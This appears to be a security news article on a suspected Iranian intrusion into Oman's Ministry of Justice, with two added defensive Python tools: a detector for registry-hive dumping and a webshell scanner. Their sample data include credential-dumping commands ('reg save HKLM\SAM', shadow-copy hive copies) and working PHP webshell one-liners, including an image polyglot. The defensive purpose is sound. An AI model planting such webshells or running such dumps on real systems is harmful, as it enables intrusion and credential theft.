An Iranian-nexus threat actor carried out targeted data theft against the Omani government on April 8 and April 10, 2026. The attackers compromised the Ministry of Justice and Legal Affairs and exfiltrated over 26,000 user records, together with judicial case data, committee decisions, and Windows registry hives from the compromised systems.
IT-security firm Hunt.io disclosed the incident publicly on May 5, 2026. This attack marks a significant escalation in Iranian cyber operations targeting Middle Eastern government institutions. It also highlights the ongoing vulnerability of judicial and legal infrastructure to advanced persistent threats.
What Happened: Iranian Threat Actor Hits Oman Ministry of Justice
Between April 8 and April 10, 2026, a suspected Iranian threat actor executed a sophisticated intrusion. The primary target was the Ministry of Justice and Legal Affairs (MJLA).
The attackers deployed a custom webshell on the subdomain mersaltest.mjla.gov.om. The webshell gave them persistent remote command execution on that server, a foothold from which they staged and exfiltrated sensitive ministry data. The tooling recovered alongside it, described below, suggests the same operation was aimed at other Omani government entities as well.
Hunt.io's AttackCapture open-directory scans first captured the intrusion artifacts on April 8, 2026. A second capture two days later confirmed that the compromise was ongoing. The captured directory included a dedicated gov.om folder containing 12 exploit scripts, which points to broader targeting of multiple Omani government organizations.
Technical Details of the Oman Data Breach
The intrusion ran through a custom webshell on a test subdomain, which suggests the attackers first gained a foothold in a development or staging environment. Such environments are routinely deployed with weaker controls than production (stale software, shared or default credentials, permissive upload handlers, little monitoring) yet often share hosts, databases, or credentials with production systems.
Once inside, the threat actor used command-and-control (C2) infrastructure and kept session logs of its activity. It also deployed automated data extraction tools to harvest information from the compromised systems.
Attack Vector and Tools
- Initial access: custom webshell on mersaltest.mjla.gov.om
- Persistence: webshell with embedded C2 code for ongoing access
- Reconnaissance: session logs and network scanning tools
- Exploitation: dedicated gov.om folder containing 12 exploit scripts
- Data extraction: automated tools targeting registry hives and user databases
Exfiltrated Data
The attackers successfully extracted sensitive government data, including:
- Over 26,000 Ministry of Justice user records
- Judicial case data and legal proceedings
- Committee decisions and internal rulings
- SAM and SYSTEM registry hives, indicating deep Windows system compromise
The extraction of the SAM and SYSTEM hives is especially concerning. The SAM hive holds the password hashes of local Windows accounts, and those hashes are encrypted with a key derived from the boot key stored in the SYSTEM hive; with both files an attacker can decrypt the hashes offline, with no further access to the host. The recovered NT hashes can then be cracked or used directly in pass-the-hash attacks, and any local administrator password shared across hosts becomes a lateral movement path into other government networks. If the SECURITY hive was taken as well, LSA secrets and cached domain credentials are exposed too. Defenders should treat every account whose hash lived on those hosts as compromised.
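To make the "alert on hive access" point concrete, here is an added example (not code from this page, from Hunt.io, or from the ministry): a small Python detector that runs over constructed process-creation records modelled on Sysmon Event ID 1 and flags the common ways attackers pull SAM, SYSTEM and SECURITY off a host: reg save or reg export of the hive keys, references to the hive files under System32\config (usually read from a shadow copy, because the live files are locked), and shadow-copy creation itself. Alerts whose parent is a web server worker process such as w3wp.exe are escalated, since that process lineage is what a webshell-driven dump looks like. The event fields, paths and process names are assumptions chosen for the illustration.

```python
"""Flag process-creation events that look like SAM/SYSTEM/SECURITY hive dumping.

Added example for this article: the records below are constructed, with field
names modelled on Sysmon Event ID 1 (process creation). Nothing here is taken
from the Oman incident or from Hunt.io's reporting.
"""
import json
import re
from dataclasses import dataclass

# Constructed sample events (JSON lines). Paths and arguments are invented.
SAMPLE_EVENTS = r"""
{"EventID": 1, "Image": "C:\\Windows\\System32\\reg.exe", "ParentImage": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "CommandLine": "reg  save HKLM\\SAM C:\\inetpub\\wwwroot\\test\\uploads\\sam.hiv"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\reg.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "\"C:\\Windows\\System32\\reg.exe\" save hklm\\system C:\\Users\\Public\\system.hiv"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\esentutl.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "esentutl.exe /y \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\System32\\config\\SECURITY /d C:\\Temp\\sec.bak"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\vssadmin.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "vssadmin create shadow /for=C:"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\reg.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\reg.exe", "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "reg add HKLM\\SYSTEM\\CurrentControlSet\\Services\\Spooler /v Start /t REG_DWORD /d 4 /f"}
"""

HIVE = r"(?:sam|system|security)"
RULES = [
    # reg save / reg export of a credential hive, e.g. "reg save HKLM\SAM out.hiv"
    ("reg_save_hive", "high",
     re.compile(r"\breg(?:\.exe)?\s+(?:save|export)\s+(?:hklm|hkey_local_machine)\\" + HIVE + r"\b")),
    # direct reference to the on-disk hive files, typically copied out of a shadow copy
    ("hive_file_access", "high",
     re.compile(r"\\system32\\config\\" + HIVE + r"\b")),
    # shadow-copy creation: the usual precursor to copying the locked hive files
    ("shadow_copy_created", "medium",
     re.compile(r"\bvssadmin(?:\.exe)?\s+create\s+shadow\b|\bwmic(?:\.exe)?\s+shadowcopy\s+call\s+create\b")),
]
# Web server worker processes: a hive dump spawned by one of these is webshell
# post-exploitation, so the alert is escalated to critical.
WEB_WORKERS = {"w3wp.exe", "httpd.exe", "nginx.exe", "php-cgi.exe"}


@dataclass
class Alert:
    rule: str
    severity: str
    image: str
    parent_image: str
    command_line: str


def normalize(command_line: str) -> str:
    """Lower-case, drop quoting and collapse whitespace so spacing tricks do not evade the rules."""
    return re.sub(r"\s+", " ", command_line.replace('"', "")).strip().lower()


def load_events(text: str) -> list:
    """Parse JSON-lines records, skipping blank lines."""
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def detect_hive_dumping(events: list) -> list:
    """Return one Alert per (event, rule) match, in event order."""
    alerts = []
    for event in events:
        if event.get("EventID") != 1:
            continue
        cmd = normalize(event.get("CommandLine", ""))
        parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        for rule, severity, pattern in RULES:
            if pattern.search(cmd):
                if parent in WEB_WORKERS:
                    severity = "critical"
                alerts.append(Alert(rule, severity, event.get("Image", ""), parent,
                                    event.get("CommandLine", "")))
    return alerts


if __name__ == "__main__":
    for alert in detect_hive_dumping(load_events(SAMPLE_EVENTS)):
        print(f"[{alert.severity:8}] {alert.rule:20} parent={alert.parent_image:13} {alert.command_line}")
```

The two benign records (a reg query and a reg add under HKLM\SYSTEM) produce no alert, which is the point of anchoring the first rule on save/export rather than on the hive name alone. In production the same logic belongs in the SIEM as a correlation rule, with the shadow-copy rule tuned against backup software that legitimately creates snapshots.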
Business and Operational Impact
The breach of Oman’s Ministry of Justice carries serious implications. These extend beyond the Omani government to the broader Middle Eastern cybersecurity landscape.
First, judicial integrity is at risk. Compromised judicial records could undermine public trust in the legal system. Attackers could potentially manipulate ongoing proceedings.
Second, citizen identity exposure creates long-term risks. Over 26,000 user records contain personal and legal data. This exposure enables identity theft, blackmail, and targeted social engineering.
Third, the multi-entity targeting is alarming. The 12 exploit scripts in a dedicated gov.om folder suggest the threat actor targets additional Omani government institutions beyond the Ministry of Justice.
Finally, nation-state attribution elevates this beyond criminal activity. Iranian-nexus operations carry geopolitical implications. They may affect regional stability and diplomatic relations.
Mitigation and Recommendations
For government institutions and critical infrastructure defenders:
- Audit test and staging environments. Immediately review all development and test subdomains. Look for unauthorized access, webshells, and anomalous file uploads.
- Hunt for webshells. Conduct thorough endpoint and network scans. Search for known and custom webshell indicators, especially on government-facing web servers.
- Reset credentials. Because the SAM hive was taken, treat every local account password on the affected hosts as compromised: reset them, use a unique local administrator password per host, and reset any accounts that reuse those credentials across government systems.
- Monitor registry access. Alert on and investigate any unauthorized access to the SAM, SYSTEM, or SECURITY hives: reg save or reg export of those keys, copies of the hive files under System32\config (usually taken from a volume shadow copy, since the live files are locked), and shadow-copy creation on servers that have no business reason to take one.
- Segment your networks. Isolate sensitive judicial and legal systems from general government networks. This limits lateral movement opportunities.
- Share threat intelligence. Share IOCs and TTPs with regional and international partners. This helps identify related campaigns.
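The audit and hunting steps above are easier to act on with a baseline scanner. The following is an added example in Python (not tooling from this page, Hunt.io, or the ministry) that walks a web root, scores each file against PHP webshell indicators (eval and command-execution primitives, request parameters flowing into them, decoding functions, a PHP open tag inside a non-script file such as an image, and scripts sitting in upload directories) and reports the files over a threshold. The web root, sample files and indicator weights are constructed for the demonstration; the indicator list should be extended for ASP.NET or JSP stacks.

```python
"""Score files under a web root for webshell indicators and flag the outliers.

Added example for this article, not tooling from Hunt.io or the ministry. The
indicator weights are illustrative and the sample files are constructed.
"""
import os
import re
import tempfile
from dataclasses import dataclass, field

# (name, weight, pattern): PHP-centric indicators; extend for ASP.NET/JSP as needed.
INDICATORS = [
    ("dynamic_eval", 3, re.compile(r"\b(?:eval|assert|create_function)\s*\(", re.I)),
    ("command_exec", 3, re.compile(r"\b(?:system|exec|shell_exec|passthru|popen|proc_open)\s*\(", re.I)),
    ("request_input", 2, re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")),
    ("obfuscation", 2, re.compile(r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(", re.I)),
    ("file_write", 1, re.compile(r"\b(?:move_uploaded_file|file_put_contents|fwrite)\s*\(", re.I)),
    ("long_encoded_blob", 2, re.compile(r"[A-Za-z0-9+/=]{200,}")),
]
SCRIPT_EXT = {".php", ".phtml", ".php5", ".php7", ".asp", ".aspx", ".jsp", ".jspx"}
UPLOAD_DIRS = {"uploads", "upload", "files", "media", "attachments"}
THRESHOLD = 5

# Constructed sample web root: two legitimate files, one one-liner shell hidden
# in the upload directory, and one PNG/PHP polyglot.
SAMPLE_FILES = {
    "index.php": "<?php\n$page = $_GET['page'] ?? 'home';\ninclude 'pages/' . basename($page) . '.php';\n",
    "upload.php": "<?php\nif (isset($_POST['submit'])) {\n"
                  "    move_uploaded_file($_FILES['f']['tmp_name'], 'uploads/' . basename($_FILES['f']['name']));\n}\n",
    "uploads/.cache.php": "<?php\n@eval(base64_decode($_POST['c']));\n"
                          "if (isset($_REQUEST['x'])) { echo shell_exec($_REQUEST['x']); }\n",
    "assets/logo.png": "\x89PNG\r\n\x1a\n<?php system($_GET['cmd']); ?>",
}


@dataclass
class Finding:
    path: str
    score: int
    hits: list = field(default_factory=list)


def score_file(path: str, root: str) -> Finding:
    """Sum indicator weights for one file; binary content is read leniently."""
    with open(path, "rb") as fh:
        text = fh.read().decode("utf-8", errors="ignore")
    hits, score = [], 0
    for name, weight, pattern in INDICATORS:
        if pattern.search(text):
            hits.append(name)
            score += weight
    # Request data flowing into eval/exec is the signature of a one-liner shell.
    if "request_input" in hits and ({"dynamic_eval", "command_exec"} & set(hits)):
        hits.append("input_reaches_exec")
        score += 2
    ext = os.path.splitext(path)[1].lower()
    # A PHP open tag inside an image or other non-script file is a polyglot dropper/shell.
    if ext not in SCRIPT_EXT and "<?php" in text.lower():
        hits.append("script_tag_in_non_script_file")
        score += 4
    # Executable scripts inside upload directories should not exist on a hardened site.
    rel_dirs = {p.lower() for p in os.path.relpath(path, root).split(os.sep)[:-1]}
    if ext in SCRIPT_EXT and rel_dirs & UPLOAD_DIRS:
        hits.append("script_in_upload_dir")
        score += 3
    return Finding(path, score, hits)


def scan_webroot(root: str, threshold: int = THRESHOLD) -> list:
    """Walk the web root and return findings at or above the threshold, highest score first."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            finding = score_file(os.path.join(dirpath, name), root)
            if finding.score >= threshold:
                findings.append(finding)
    return sorted(findings, key=lambda f: f.score, reverse=True)


def build_sample_webroot() -> str:
    """Write the constructed sample files into a temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="webroot-")
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8", newline="") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    demo_root = build_sample_webroot()
    for f in scan_webroot(demo_root):
        print(f"{f.score:3}  {os.path.relpath(f.path, demo_root)}  {', '.join(f.hits)}")
```

Point the scanner at the document root of every test and staging host as well as production, and diff the results against a known-good baseline: the legitimate upload handler scores but stays under the threshold, while the hidden shell and the polyglot image rise well above it. Scores are a triage aid, not a verdict; review each flagged file and check its modification time and web server access logs for the request that wrote it.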
Bottom line: The Iranian-nexus attack on Oman’s Ministry of Justice shows why government web infrastructure needs robust security controls. Test and staging environments are often overlooked. However, they provide direct pathways to sensitive production data. Organizations should prioritize webshell hunting, credential hygiene, and network segmentation to mitigate similar nation-state threats.
Incident Summary
| Incident: | Iranian-nexus threat actor targeting Oman Ministry of Justice (EuRepoC #5531) |
| Affected Systems: | Ministry of Justice and Legal Affairs (MJLA), mersaltest.mjla.gov.om, multiple Omani government entities |
| Attack Dates: | April 8–10, 2026 |
| Disclosure Date: | May 5, 2026 (by Hunt.io) |
| Incident Type: | Data theft; Hijacking with Misuse |
| Data Exposed: | 26,000+ user records, judicial case data, committee decisions, SAM and SYSTEM registry hives |
| Attribution: | Iranian-nexus threat actor (suspected state-sponsored) |
References
- Hunt.io, “Iranian-Nexus Threat Actor Targeted Government Institutions In Oman On 8 April And 10 April 2026,” Hunt.io Threat Intelligence, May 5, 2026, https://database.eurepoc-dashboard.eu/?cyber_incident=5531 (accessed May 23, 2026)
- EuRepoC Database, “Cyber Incident #5531 – Iranian-Nexus Threat Actor Targeted Government Institutions In Oman,” European Repository of Cyber Incidents, May 7, 2026, https://eurepoc.eu/table-view/?cyber_incident=5531 (accessed May 23, 2026)